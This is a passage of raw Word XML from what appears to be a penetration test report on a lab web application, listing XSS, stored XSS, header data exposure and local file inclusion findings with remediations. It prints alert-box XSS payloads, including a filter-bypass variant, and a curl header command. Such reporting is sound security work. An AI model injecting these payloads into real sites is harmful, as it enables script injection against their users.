          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">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34">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35">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36">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff9900"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff9900"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="390" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ft98cc3eh3ql" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Findings</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2">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XSS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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56">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158">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name entry field is susceptible to cross site scripting (XSS) </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">&lt;script&gt;alert(“you’ve been breached”)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">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2476500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="40"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4657725" cy="2476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C">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5E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation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Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2">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4">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65">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS (Advanced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">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7">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68">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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A">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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">On the memory-planner.php page despite there being basic input validation it is easily bypassed breaking up the script word. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;SCRIPscriptT&gt;alert(“you’ve been breached”)&lt;/SCRIPscriptT&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2171700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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657725" cy="2171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0">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7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72">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">More in depth input validation </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5">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78">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS (Stored)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The comments input page was vulnerable to poor input validation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert(“hi”)&lt;/script&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2628900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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657725" cy="2628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3">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84">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85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">More in depth input validation </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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8">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A">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8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive Data Exposure (Response Headers) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">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8E">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F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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0">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive information was stored within the http response headers. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This was accessed via a simple command to retrieve the response headers. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -v http://192.168.14.35/About-Rekall.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2298700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="17"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657725" cy="2298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6">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7">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98">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99">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sanitize header responses to mitigate sensitive data being exposed. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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C">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E">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9F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local File Inclusion </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A0">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1">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A2">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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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4">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local File Inclusion successfully uploaded in the form of a .php file </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1282700"/>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65772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2120900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="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657725" cy="2120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A">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A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AC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Assign IDs to every path and save them to a secure database to prevent any user from viewing or altering the file path. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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F">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1">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B2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local File Inclusion (With File Validation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
